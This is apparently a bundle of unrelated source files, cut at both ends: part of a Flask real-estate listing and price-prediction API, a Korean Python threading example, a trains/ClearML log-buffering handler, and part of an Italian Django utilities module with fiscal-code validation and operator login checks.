# total=House.query.filter(House.price >argdict['totalPriceRange'][0],House.price<argdict['totalPriceRange'][1],
# House.floor_area >argdict['area'][0],House.floor_area<argdict['area'][1],
# House._unit_price>argdict['unitPriceRange'][0],House._unit_price<argdict['unitPriceRange'][1],
# House.District.in_(argdict["district"]),
# House.House_structure.in_(argdict['houseStructrue']),
#
# House.east==direction["east"],House.west==direction["west"],House.east_north==direction["northeast"],House.east_south==direction["southeast"]
# ,House.north==direction["north"],House.south==direction["south"],House.west_south==direction["southwest"],House.east_south==direction["southwest"]
# ,
# House.Interior_design.in_(argdict["decoration"]),
# House.heating.in_(argdict["heating"])
# ,House.elevator.in_(argdict["elevator"])
# ).count()
#
# for item in houses:
# houseList.append(item.generateDetail())
#
# print(houses)
# print(total)
return {
"success": 1,
"data": {
"total": total,
"houseList": filter_List
},
"error": None
}
else:
return {
"success": 1,
"data": {
"total": 'total',
"houseList": 'houseList'
},
"error": None
}
####################################
# 3.2. 添加收藏接口: ###
####################################
# 输入
# @list.route("/addCollection",methods=['GET','POST'])
# def addCollection():
#
# 注释区域
# @list.route("/getHouseList", methods=['GET', 'POST'])
# def houses():
# #connect to the database
# #db.session
# #HouseList = []
# #HouseList=db.session.query(...).all
#
#
# return {
# "success": 1,
# "data": {
# "total": 100,
# "houseList":[
# {
# "imgUrl":"None",
# "title":"Name",
# "describe":"describe1",
# "position":"term",
# "coordinate":"none",
# "houseId":"0",
# "price":"1",
# "Collected": "true"
#
# }, {
# "imgUrl":"None",
# "title":"None",
# "describe":"None",
# "position":"None",
# "coordinate":"None",
# "houseId":"2",
# "price":"1",
# "Collected": "true"
#
# },
# ]
# },
# "error":None
# }
# =======
# @list.route("/getHouseList", methods=['GET', 'POST'])
# def houses():
# #connect to the database
# #db.session
# #HouseList = []
# #HouseList=db.session.query(...).all
#
# fd = [{'title': 'The corner gate of Majiabao has two bedrooms and double balcony, with convenient transportation',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 0,
# 'describe': '2 room 1 halls | 75.43square meters | south west north | Banlou | high_floor ( total: 6 )',
# 'unitPrice': 52897,
# 'collected': 'true',
# 'totalPrice': '3.99',
# 'imgUrl': 'https://img1.baidu.com/it/u=1947907598,3262319172&fm=26&fmt=auto&gp=0.jpg'},
# {
# 'title': 'The corner gate of Majiabao is close to the subway, with good north-south transparency, sufficient lighting and complete supporting facilities',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 1,
# 'describe': '2 room 1 halls | 69.1square meters | south north | Banlou | middle_floor ( total: 6 )',
# 'unitPrice': 60203,
# 'collected': 'true',
# 'totalPrice': '4.16',
# 'imgUrl': 'https://img1.baidu.com/it/u=1267115342,3426495198&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen Dongli, full of five unique, sincere sale, easy to see',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 2,
# 'describe': '2 room 1 halls | 73.63square meters | north southeast | tower | high_floor ( total: 19 )',
# 'unitPrice': 51202,
# 'collected': 'true',
# 'totalPrice': '3.77',
# 'imgUrl': 'https://img1.baidu.com/it/u=632875621,3849475090&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen Majiabao Jiaomen Dongli two bedroom Jiaomen East Station',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 3,
# 'describe': '2 room 1 halls | 64.8square meters | south | tower | low_floor ( total: 19 )',
# 'unitPrice': 59723,
# 'collected': 'true',
# 'totalPrice': '3.87',
# 'imgUrl': 'https://img2.baidu.com/it/u=428922356,2955791946&fm=26&fmt=auto&gp=0.jpg'},
# {
# 'title': 'The corner gate of Majiabao is accessible from north to south, and the floor is full of five only two bedrooms',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 4,
# 'describe': '2 room 1 halls | 53.9square meters | south north | Banlou | low_floor ( total: 6 )',
# 'unitPrice': 56587,
# 'collected': 'true',
# 'totalPrice': '3.05',
# 'imgUrl': 'https://img1.baidu.com/it/u=1206287871,1293580609&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen Majiabao Manwu subway line 10 Line 4 Jiaomen west station',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 5,
# 'describe': '2 room 1 halls | 54.1square meters | south north | Banlou | low_floor ( total: 6 )',
# 'unitPrice': 60999,
# 'collected': 'true',
# 'totalPrice': '3.3',
# 'imgUrl': 'https://img0.baidu.com/it/u=3070448361,252388962&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Fine decoration of three bedroom low floor in dongsida community, Jiaomen, Majiabao',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 6,
# 'describe': '3 room 1 halls | 76.12square meters | south north | Banlou | low_floor ( total: 6 )',
# 'unitPrice': 52286,
# 'collected': 'true',
# 'totalPrice': '3.98',
# 'imgUrl': 'https://img2.baidu.com/it/u=3614374747,1028706245&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Sunshine Garden Corner Gate East Majiabao dahongmen north south two houses',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 7,
# 'describe': '2 room 1 halls | 89.99square meters | south north | Banlou | top_floor ( total: 19 )',
# 'unitPrice': 75564,
# 'collected': 'true',
# 'totalPrice': '6.8',
# 'imgUrl': 'https://img0.baidu.com/it/u=25061059,992130011&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen, Majiabao, Yangqiao, the only regular two bedroom in five years',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 8,
# 'describe': '2 room 1 halls | 70.4square meters | south north | Banlou | high_floor ( total: 6 )',
# 'unitPrice': 57245,
# 'collected': 'true',
# 'totalPrice': '4.03',
# 'imgUrl': 'https://img2.baidu.com/it/u=1126845708,2463843041&fm=11&fmt=auto&gp=0.jpg'},
# {'title': 'Yangqiao, Majiabao, two bedrooms in Jiaomen Dongli community',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 9,
# 'describe': '2 room 1 halls | 54.11square meters | south north | Banlou | high_floor ( total: 6 )',
# 'unitPrice': 60063,
# 'collected': 'true',
# 'totalPrice': '3.25',
# 'imgUrl': 'https://img0.baidu.com/it/u=3774158723,4269643202&fm=11&fmt=auto&gp=0.jpg'}]
# nDict = {
# "success": 1,
# "data": {
# "total": 100,
# "houseList": fd
# },
# "error": None
# }
# str_json = json.dumps(nDict, indent=2, ensure_ascii=False)
# return str_json
#
#
#
@houseList.route("/recommendHouse", methods=['GET', 'POST'])
def recommendHouse():
u_id = request.json.get('userId')
print(u_id)
return {
"success": 1,
"data": {
"houseList": recommend(u_id)
},
"error": None
}
def recommend(c_id):
print("####################Test for recommender###########################")
def filterDirection(l1, l2):
l1.append('no')
for element in l2:
if element not in l1:
return False
return True
if c_id is None or c_id == '':
document = {}
document_id = 0
houses = House.query.filter(House.saled == 'FALSE').all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
recommend_list = list(document.values())
else:
c_id = int(c_id)
c_target = Targets.query.filter(Targets.id == c_id).first()
tP = c_target.totalPriceRange.split(',')
up = c_target.unitPriceRange.split(',')
ar = c_target.area.split(',')
ds = c_target.district.split(',')
he = c_target.heating.split(',')
hs = c_target.houseStructure.split(',')
dr = c_target.direction.split(',')
de = c_target.decoration.split(',')
el = c_target.elevator.split(',')
targetDict = {
"totalPriceRange": tP,
"unitPriceRange": up,
"area": ar,
"district": ds,
"houseStructrue": hs,
"direction": dr,
"decoration": de,
"heating": he,
"elevator": el,
}
document = {}
document_id = 0
houses = House.query.filter(House.saled == 'FALSE').all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
recommend_list = []
hList = document.values()
for h in hList:
if h['title'] != '':
if (int(targetDict['totalPriceRange'][0]) <= int(h['totalPrice']) <= int(
targetDict['totalPriceRange'][1]) and
float(targetDict['area'][0]) <= float((h['describe'].split('|')[1]).split(' ')[0]) <= float(
targetDict['area'][
1]) and
int(targetDict['unitPriceRange'][0]) <= int(h['unitPrice']) <= int(
targetDict['unitPriceRange'][1]) and
h['district'] in (targetDict["district"]) and
filterDirection((h['describe'].split('|')[2]).split(' '), targetDict['direction']) and
(h['describe'].split('|')[4]).split(' ')[1] in (targetDict['houseStructrue']) and
h['otherInfo'].split('|')[0] in (targetDict["decoration"]) and
h['otherInfo'].split('|')[1] in (targetDict["heating"]) and
h['otherInfo'].split('|')[2] in (targetDict["elevator"])
):
recommend_list.append(h)
if len(recommend_list) < 3:
for i in range(3 - len(recommend_list)):
recommend_list.append(document[random.randint(0, len(document) - 1)])
r_lenth = len(recommend_list)
return_list = []
random_index = []
for i in range(0, 3):
temp = random.randint(0, r_lenth - 1)
while temp in random_index:
temp = random.randint(0, r_lenth - 1)
random_index.append(temp)
for i in range(0, 3):
return_list.append(recommend_list[random_index[i]])
print(return_list)
return return_list
@houseList.route("/returnCommunity", methods=['GET', 'POST'])
def returnCommunity():
s_string = request.json.get('searchString')
return {
"success": 1,
"data": {
"community": searchCommunity(s_string)
},
"error": None
}
estimator = joblib.load('model.pkl')
@houseList.route("/prediction", methods=['GET', 'POST'])
def prediction():
# s_string = request.json.get('searchString')
area = float(request.json.get('area'))
bathroom = request.json.get('bathroom')
buildingStructure = request.json.get('buildingStructure')
buildingType = request.json.get('buildingType')
community = request.json.get('community')
decoration = request.json.get('decoration')
direction = request.json.get('direction')
district = request.json.get('district')
elevator = request.json.get('elevator')
elevatorNum = int(request.json.get('elevatorNum'))
floorType = request.json.get('floorType')
floors = request.json.get('floors')
hall = request.json.get('hall')
heating = request.json.get('heating')
houseNum = int(request.json.get('houseNum'))
houseStructure = request.json.get('houseStructure')
kitchen = request.json.get('kitchen')
property_ = request.json.get('property')
region = int(request.json.get('region'))
room = request.json.get('room')
community_convert = data[community]
direction_convert = [0, 0, 0, 0, 0, 0, 0, 0]
for i in range(len(direction) - 1):
direction_convert[int(direction[i])] = 1
predictArray = [property_, area, houseStructure, buildingType, buildingStructure, decoration,
elevatorNum / houseNum,
heating, elevator, district, community_convert, region, hall, kitchen, bathroom, floorType, floors]
for element in direction_convert:
predictArray.append(element)
predictArray.append(room)
# Load Model
print(os.getcwd())
# 产权信息 建筑面积 户型结构 建筑类型 建筑结构 装修 梯户比 供暖 电梯 区域 小区 具体区域 厅 厨 卫 楼层类型 总层数 东南西北东南东北西南西北 室
# estimate_price = estimator.predict(
# [[0, 100, 0, 0, 0, 0, 1, 0, 0, 10, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1]])
estimate_price = estimator.predict([predictArray])[0]
print(estimate_price, '############Test for ml')
return {
"success": 1,
"data": {
"price": estimate_price
},
"error": None
}
@houseList.route("/update_bm25", methods=['GET', 'POST'])
def update_bm25():
# while True:
# # time.sleep(3600)
document = {}
document_id = 0
houses = House.query.filter().all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
#####Search Engine
stopwords = set() # A set to store the stopwords
with open("stopwords.txt") as f:
for line in f:
line = line[:-1] # Remove the /n in the back of the line
stopwords.add(line)
preProcessing(document)
return {
"success": 1,
"error": None
}
# t1 = threading.Thread(target=update_bm25()) # 通过target指定子线程要执行的任务。可以通过args=元组 来指定test1的参数。
# t1.start()
|
py_ad_1_3.py
|
"""
Section 1
Multithreading - Thread (1) - Basic
Keyword - Threading basic
"""
import logging
import threading
import time
# 스레드 실행 함수
def thread_func(name):
logging.info("Sub-Thread %s: starting", name)
time.sleep(3)
logging.info("Sub-Thread %s: finishing", name)
# 메인 영역
if __name__ == "__main__":
# Logging format 설정
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
logging.info("Main-Thread: before creating thread")
# 함수 인자 확인
x = threading.Thread(target=thread_func, args=("First",))
logging.info("Main-Thread: before running thread")
# 서브 스레드 시작
x.start()
# 주석 전후 결과 확인
x.join() # 서브 스레드의 작업이 끝날 떄까지, 메인 스레드가 기다림.
logging.info("Main-Thread: wait for the thread to finish")
logging.info("Main-Thread: all done")
|
log.py
|
import json
import sys
import time
from pathlib2 import Path
from logging import LogRecord, getLogger, basicConfig, getLevelName, INFO, WARNING, Formatter, makeLogRecord, warning
from logging.handlers import BufferingHandler
from threading import Thread, Event
from six.moves.queue import Queue
from ...backend_api.services import events
from ...backend_api.session.session import MaxRequestSizeError
from ...config import config
buffer_capacity = config.get('log.task_log_buffer_capacity', 100)
class TaskHandler(BufferingHandler):
__flush_max_history_seconds = 30.
__wait_for_flush_timeout = 10.
__max_event_size = 1024 * 1024
__once = False
__offline_filename = 'log.jsonl'
@property
def task_id(self):
return self._task_id
@task_id.setter
def task_id(self, value):
self._task_id = value
def __init__(self, task, capacity=buffer_capacity):
super(TaskHandler, self).__init__(capacity)
self.task_id = task.id
self.session = task.session
self.last_timestamp = 0
self.counter = 1
self._last_event = None
self._exit_event = None
self._queue = None
self._thread = None
self._pending = 0
self._offline_log_filename = None
if task.is_offline():
offline_folder = Path(task.get_offline_mode_folder())
offline_folder.mkdir(parents=True, exist_ok=True)
self._offline_log_filename = offline_folder / self.__offline_filename
def shouldFlush(self, record):
"""
Should the handler flush its buffer
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
if self._task_id is None:
return False
# if we need to add handlers to the base_logger,
# it will not automatically create stream one when first used, so we must manually configure it.
if not TaskHandler.__once:
base_logger = getLogger()
if len(base_logger.handlers) == 1 and isinstance(base_logger.handlers[0], TaskHandler):
if record.name != 'console' and not record.name.startswith('trains.'):
base_logger.removeHandler(self)
basicConfig()
base_logger.addHandler(self)
TaskHandler.__once = True
else:
TaskHandler.__once = True
# if we passed the max buffer
if len(self.buffer) >= self.capacity:
return True
# if the first entry in the log was too long ago.
# noinspection PyBroadException
try:
if len(self.buffer) and (time.time() - self.buffer[0].created) > self.__flush_max_history_seconds:
return True
except Exception:
pass
return False
def _record_to_event(self, record):
# type: (LogRecord) -> events.TaskLogEvent
if self._task_id is None:
return None
timestamp = int(record.created * 1000)
if timestamp == self.last_timestamp:
timestamp += self.counter
self.counter += 1
else:
self.last_timestamp = timestamp
self.counter = 1
# ignore backspaces (they are often used)
full_msg = record.getMessage().replace('\x08', '')
return_events = []
while full_msg:
msg = full_msg[:self.__max_event_size]
full_msg = full_msg[self.__max_event_size:]
# unite all records in a single second
if self._last_event and timestamp - self._last_event.timestamp < 1000 and \
len(self._last_event.msg) + len(msg) < self.__max_event_size and \
record.levelname.lower() == str(self._last_event.level):
# ignore backspaces (they are often used)
self._last_event.msg += '\n' + msg
continue
# if we have a previous event and it timed out, return it.
new_event = events.TaskLogEvent(
task=self.task_id,
timestamp=timestamp,
level=record.levelname.lower(),
worker=self.session.worker,
msg=msg
)
if self._last_event:
return_events.append(self._last_event)
self._last_event = new_event
return return_events
def flush(self):
if self._task_id is None:
return
if not self.buffer:
return
buffer = None
self.acquire()
if self.buffer:
buffer = self.buffer
self.buffer = []
self.release()
if not buffer:
return
# noinspection PyBroadException
try:
record_events = [r for record in buffer for r in self._record_to_event(record)] + [self._last_event]
self._last_event = None
batch_requests = events.AddBatchRequest(requests=[events.AddRequest(e) for e in record_events if e])
except Exception:
self.__log_stderr("WARNING: trains.log - Failed logging task to backend ({:d} lines)".format(len(buffer)))
batch_requests = None
if batch_requests and batch_requests.requests:
self._pending += 1
self._add_to_queue(batch_requests)
def _create_thread_queue(self):
if self._queue:
return
self._queue = Queue()
self._exit_event = Event()
self._exit_event.clear()
# multiple workers could be supported as well
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def _add_to_queue(self, request):
self._create_thread_queue()
self._queue.put(request)
def close(self, wait=False):
# self.__log_stderr('Closing {} wait={}'.format(os.getpid(), wait))
# flush pending logs
if not self._task_id:
return
# avoid deadlocks just skip the lock, we are shutting down anyway
self.lock = None
self.flush()
# shut down the TaskHandler, from this point onwards. No events will be logged
_thread = self._thread
self._thread = None
if self._queue:
self._exit_event.set()
self._queue.put(None)
self._task_id = None
if wait and _thread:
# noinspection PyBroadException
try:
timeout = 1. if self._queue.empty() else self.__wait_for_flush_timeout
_thread.join(timeout=timeout)
if not self._queue.empty():
self.__log_stderr('Flush timeout {}s exceeded, dropping last {} lines'.format(
timeout, self._queue.qsize()))
# self.__log_stderr('Closing {} wait done'.format(os.getpid()))
except Exception:
pass
# call super and remove the handler
super(TaskHandler, self).close()
def _send_events(self, a_request):
try:
self._pending -= 1
if self._offline_log_filename:
with open(self._offline_log_filename.as_posix(), 'at') as f:
f.write(json.dumps([b.to_dict() for b in a_request.requests]) + '\n')
return
# if self._thread is None:
# self.__log_stderr('Task.close() flushing remaining logs ({})'.format(self._pending))
res = self.session.send(a_request)
if res and not res.ok():
self.__log_stderr("failed logging task to backend ({:d} lines, {})".format(
len(a_request.requests), str(res.meta)), level=WARNING)
except MaxRequestSizeError:
self.__log_stderr("failed logging task to backend ({:d} lines) log size exceeded limit".format(
len(a_request.requests)), level=WARNING)
except Exception as ex:
self.__log_stderr("Retrying, failed logging task to backend ({:d} lines): {}".format(
len(a_request.requests), ex))
# we should push ourselves back into the thread pool
if self._queue:
self._pending += 1
self._queue.put(a_request)
def _daemon(self):
# multiple daemons are supported
leave = self._exit_event.wait(0)
request = True
while not leave or request:
# pull from queue
request = None
if self._queue:
# noinspection PyBroadException
try:
request = self._queue.get(block=not leave)
except Exception:
pass
if request:
self._send_events(request)
leave = self._exit_event.wait(0)
# self.__log_stderr('leaving {}'.format(os.getpid()))
@staticmethod
def __log_stderr(msg, level=INFO):
# output directly to stderr, make sure we do not catch it.
write = sys.stderr._original_write if hasattr(sys.stderr, '_original_write') else sys.stderr.write
write('{asctime} - {name} - {levelname} - {message}\n'.format(
asctime=Formatter().formatTime(makeLogRecord({})),
name='trains.log', levelname=getLevelName(level), message=msg))
@classmethod
def report_offline_session(cls, task, folder):
filename = Path(folder) / cls.__offline_filename
if not filename.is_file():
return False
with open(filename.as_posix(), 'rt') as f:
i = 0
while True:
try:
line = f.readline()
if not line:
break
list_requests = json.loads(line)
for r in list_requests:
r.pop('task', None)
i += 1
except StopIteration:
break
except Exception as ex:
warning('Failed reporting log, line {} [{}]'.format(i, ex))
batch_requests = events.AddBatchRequest(
requests=[events.TaskLogEvent(task=task.id, **r) for r in list_requests])
if batch_requests.requests:
res = task.session.send(batch_requests)
if res and not res.ok():
warning("failed logging task to backend ({:d} lines, {})".format(
len(batch_requests.requests), str(res.meta)))
return True
|
utils.py
|
# -*- coding: utf-8 -*-
# Stdlib imports
import base64
import datetime
import hashlib
import json
import jwt
import logging
import re
import threading
from io import BytesIO
# Imports from your apps
from operator import add
# Third-party app imports
from codicefiscale import codicefiscale
from dateutil import tz
from django.conf import settings
from django.http import HttpResponse, JsonResponse
# Core Django imports
from django.shortcuts import render
from django.template.loader import get_template
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode
from xhtml2pdf import pisa
from agency.classes.choices import RoleTag, StatusCode, SUPRESSED_COUNTRY
from agency.models import Operator, AddressMunicipality, AddressCity, AddressNation, SetupTask
from .utils_db import get_attributes_RAO, get_operator_by_username
LOG = logging.getLogger(__name__)
def set_client_ip(request=None):
"""
Restituisce il dizionario "extra" da aggiungere alle chiamate dei LOG
:param request: request
:return: dizionario "extra"
"""
ip = get_client_ip(request)
d = {'client_ip': ip}
return d
def get_client_ip(request):
"""
Restituisce l'IP del client
:param request: request
:return: IP del client
"""
if not request:
return "N.D."
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR', None)
client_ip = request.META.get('HTTP_CLIENT_IP', None)
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
elif client_ip:
ip = client_ip
else:
ip = request.META.get('REMOTE_ADDR', None)
return ip
def json_default(value):
"""
Funzione per convertire un attributo di una classe in formato JSON
:param value: attrivuto della classe
:return: attributo in JSON
"""
if isinstance(value, datetime.date):
return dict(year=value.year, month=value.month, day=value.day)
else:
return value.__dict__
def format_crypto(crypto_mail, tag):
"""
Genera un valore booleano sulla base del tag passato in input
:param crypto_mail: valore impostato tabella settings per l'invio della mail
:param tag: CryptoTag
:return: True/False
"""
if crypto_mail == tag:
return True
return False
def calculate_age(born):
"""
Calcola gli anni a partire dalla data di nascita
:born: data di nascita
:return: Età
"""
today = datetime.date.today()
return today.year - born.year - ((today.month, today.day) < (born.month, born.day))
def verify_cf(request):
"""
Verifica che il codice fiscale sia conforme ai dati inseriti nel form, altrimenti mostra quali dati sono errati
:request: request contenente i dati del cittadino
:return: dic con True/False
"""
try:
fiscal_code = request.POST.get('fiscalNumber').upper()
belfiore_code = request.POST.get('placeOfBirth') if request.POST.get('placeOfBirth') else request.POST.get(
'nationOfBirth')
verify_fiscal_code = {
'familyName': fiscal_code[0:3] == codicefiscale.encode_surname(request.POST.get('familyName')),
'name': fiscal_code[3:6] == codicefiscale.encode_surname(request.POST.get('name')),
'gender': codicefiscale.decode(fiscal_code)['sex'] == request.POST.get('gender'),
'dateOfBirth': codicefiscale.decode(fiscal_code)['birthdate'] == datetime.datetime.strptime(
request.POST.get('dateOfBirth'), '%d/%m/%Y'),
'belfiore_code': codicefiscale.decode(fiscal_code)['birthplace']['code'] == belfiore_code
}
if belfiore_code == 'Z998':
verify_fiscal_code['status_code'] = StatusCode.BAD_REQUEST.value
return verify_fiscal_code
calculated_cf = codicefiscale.encode(request.POST.get('familyName'),
request.POST.get('name'),
request.POST.get('gender'),
request.POST.get('dateOfBirth'),
belfiore_code
)
if fiscal_code == calculated_cf.upper():
verify_fiscal_code = {
'status_code': StatusCode.OK.value,
'familyName': True,
'name': True,
'gender': True,
'dateOfBirth': True,
'belfiore_code': True,
}
else:
verify_fiscal_code['status_code'] = StatusCode.ERROR.value
except Exception as e:
LOG.error("Exception: {}".format(str(e)), extra=set_client_ip())
verify_fiscal_code = {
'status_code': StatusCode.EXC.value,
}
return verify_fiscal_code
def render_to_pdf(template_src, context_dict):
"""
Genera un file pdf
:param template_src: template .html del pdf
:param context_dict: dict contenente alcuni dati/settings (es. pagesize)
:return: pagina pdf
"""
template = get_template(template_src)
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return Exception()
def download_pdf(params, passphrase=None, pin=None):
"""
Download di un file pdf
:param params: dic contenente informazioni come username dell'operatore, timestamp creazione richiesta etc..
:param passphrase: parte della passphrase da inserire sul pdf (nel caso di un'identificazione)
:param pin: pin temporaneo da inserire sul pdf (nel caso della creazione di un operatore)
:return: pagina pdf
"""
op = get_operator_by_username(params['username'])
if 'timestamp' in params:
timestamp_to_datetime = datetime.datetime.strptime(params['timestamp'], '%Y-%m-%d %H:%M')
token_expiration_datetime = from_utc_to_local(timestamp_to_datetime) + datetime.timedelta(days=30)
token_expiration_datetime = token_expiration_datetime.strftime('%d/%m/%Y %H:%M')
else:
token_expiration_datetime = None
context_dict = {
'pagesize': 'A4',
'RAO_name': get_attributes_RAO().name,
'operator': op,
'token_expiration_date': token_expiration_datetime
}
if passphrase:
context_dict['passphrase'] = passphrase
context_dict['pdf_object'] = params['pdf_object'] if 'pdf_object' in params else ""
context_dict['name_user'] = params['name_user'] if 'name_user' in params else ""
context_dict['surname_user'] = params['surname_user'] if 'surname_user' in params else ""
template = get_template(settings.TEMPLATE_URL_PDF + 'pdf_template.html')
else:
context_dict['pin'] = pin
template = get_template(settings.TEMPLATE_URL_PDF + 'pdf_pin_template.html')
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
cf_user = params['fiscalNumber'] if passphrase else params['username']
if not pdf.err:
LOG.info("{} - PDF scaricato".format(cf_user), extra=set_client_ip())
filename = params['id'] + ".pdf" if passphrase else params['operator'] + ".pdf"
response = HttpResponse(result.getvalue(), content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename=' + filename
return response
LOG.warning("{} - PDF non scaricato - download automatico non riuscito".format(cf_user), extra=set_client_ip())
return Exception()
def date_converter(date_with_slash):
"""
Converte una data dal formato dd/mm/YYYY a YYYY-mm-dd
:param date_with_slash: data in formato dd/mm/YYYY
:return: data in formato YYYY-mm-dd
"""
date_object = datetime.datetime.strptime(date_with_slash, '%d/%m/%Y')
return date_object.strftime('%Y-%m-%d')
def from_utc_to_local(utc_datetime):
"""
Converte una datetime utc in un datetime locale
:param utc_datetime: datetime in uct
:return: datetime locale
"""
local_date = utc_datetime.replace(tzinfo=tz.tzutc())
local_date = local_date.astimezone(tz.tzlocal())
return local_date
def capitalize_text(text):
"""
Converte una stringa in miniscolo con le iniziali in maiuscolo
:param text: stringa da convertire
:return: stringa convertita
"""
array_string = text.lower().split(' ')
for i, tmp_name in enumerate(array_string):
array_string[i] = tmp_name.capitalize()
return ' '.join(array_string)
def check_ts(number):
"""
Verifica la validità del codice di identificazione della tessera sanitaria
:param number: codice di identificazione da verificare
:return: True/False
"""
if not number.isdigit():
return False
if len(number) != 20:
return False
if number[0:5] != "80380":
return False
even = [sum([int(digit) for digit in str(int(x) * 2)]) for x in number[-2::-2]]
odd = [int(x) for x in number[-1::-2]]
tot = sum(map(add, even, odd))
if tot % 10 != 0:
return False
return True
def delete_session_key(request):
"""
Cancellazione chiave di sessione
:param request: request
:return:
"""
try:
key_name = request.GET.get('key_name')
if key_name and key_name in request.session:
del request.session[key_name]
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip(request))
return HttpResponse("Chiave Cancellata")
def load_select(request):
"""
Caricamento dinamico select.
:param request: request
"""
code = request.GET.get('code')
try:
if request.GET.get('select') == 'placeOfBirth':
if request.GET.get('birth_date') and str(request.GET.get('is_form')) == 'false':
data = AddressMunicipality.objects.filter(city__code=code,
dateStart__lt=request.GET.get('birth_date'),
dateEnd__gt=request.GET.get('birth_date')).order_by('name')
else:
data = AddressMunicipality.objects.filter(city__code=code).order_by('name')
return render(request, settings.TEMPLATE_URL_AGENCY + 'dropdown_options.html',
{'list': data, 'municipality': True})
elif request.GET.get('select') == 'addressMunicipality':
data = AddressMunicipality.objects.filter(city__code=code,
dateEnd__gt=datetime.date.today()).order_by('name')
return render(request, settings.TEMPLATE_URL_AGENCY + 'dropdown_options.html',
{'list': data, 'municipality': False})
elif (request.GET.get('select') == 'countyOfBirth' or request.GET.get(
'select') == 'addressCountry') and request.GET.get('code') == "Z000":
data = AddressCity.objects.all().order_by('name')
elif request.GET.get('select') == 'nationOfBirth':
data = AddressNation.objects.all().order_by('name')
elif request.GET.get('select') == 'addressNation':
data = AddressNation.objects.all().exclude(code__in=SUPRESSED_COUNTRY)
else:
data = None
except Exception as e:
LOG.error("Exception: {}".format(str(e)), extra=set_client_ip(request))
return render(request, settings.TEMPLATE_URL_AGENCY + 'error.html',
{"statusCode": StatusCode.EXC.value, "message": "Errore durante il caricamento della Select"})
return render(request, settings.TEMPLATE_URL_AGENCY + 'dropdown_options.html', {'list': data})
def page_manager(current_page, list_view, entry_view=settings.ENTRY_FOR_PAGE):
"""
Data una lista e la pagina attuale, restituisce un dizionario per la gestione del relativo paginator
:param current_page: pagina della lista visualizzata
:param list_view: elenco da visualizzare (es. operator/request_identity)
:param entry_view: num. di entry da visualizzare per pagina (di default 5)
:return: dizionario con num. di pagina prec./attuale/succ. + entry da visualizzare
"""
if list_view is None:
pages = {
'current': 1,
'previous': None,
'next': None,
'entries': list_view
}
return pages
count_all_entries = list_view.count()
first_entry = entry_view * (int(current_page) - 1)
last_entry = entry_view * int(current_page)
max_n_page = count_all_entries / entry_view if count_all_entries % entry_view == 0 else (count_all_entries /
entry_view) + 1
pages = {
'current': int(current_page),
'previous': int(current_page) - 1 if int(current_page) - 1 > 0 else None,
'next': int(current_page) + 1 if int(current_page) + 1 <= int(max_n_page) else None,
'entries': list_view[first_entry:last_entry]
}
return pages
def check_password(username, password, status, request=None):
"""
Verifica se l'operatore esiste, è attivo e se la pass è errata/scaduta
:param request: request
:param username: codiceFiscale/username dell'operatore
:param password: password dell'operatore
:param status: status dell'operatore
:return: StatusCode
"""
hash_pass_insert = hashlib.sha256(password.encode()).hexdigest()
user = Operator.objects.filter(fiscalNumber=username.upper(), status=status).last()
if user:
if not user.signStatus:
return StatusCode.SIGN_NOT_AVAILABLE.value
hash_pass = user.password
try:
jwt.decode(hash_pass, hash_pass_insert)
return StatusCode.OK.value
except jwt.ExpiredSignatureError:
return StatusCode.EXPIRED_TOKEN.value
except jwt.InvalidSignatureError:
return StatusCode.ERROR.value
except Exception as e:
LOG.warning('[{}] eccezione durante la verifica della password: {}'.format(username, e),
extra=set_client_ip(request))
return StatusCode.EXC.value
def check_operator(username, password, request=None):
"""
Verifica se l'operatore esiste, è attivo e se la pass è errata/scaduta
:param request: request
:param username: codiceFiscale/username dell'operatore
:param password: password dell'operatore
:return: StatusCode
"""
hash_pass_insert = hashlib.sha256(password.encode()).hexdigest()
user = Operator.objects.filter(fiscalNumber=username.upper()).last()
if user:
if not user.status:
return StatusCode.UNAUTHORIZED.value
hash_pass = user.password
try:
jwt.decode(hash_pass, hash_pass_insert)
user.failureCounter = 0
user.save()
if not user.signStatus and user.isActivated:
return StatusCode.FORBIDDEN.value
elif not user.signStatus and not user.isActivated:
return StatusCode.SIGN_NOT_AVAILABLE.value
return StatusCode.OK.value
except jwt.ExpiredSignatureError:
return StatusCode.EXPIRED_TOKEN.value
except jwt.InvalidSignatureError:
user.failureCounter += 1
user.failureTimestamp = datetime.datetime.utcnow()
if user.failureCounter >= 3:
user.status = False
user.save()
LOG.warning("{} - Credenziali errate, Utente bloccato".format(username), extra=set_client_ip(request))
return StatusCode.UNAUTHORIZED.value
else:
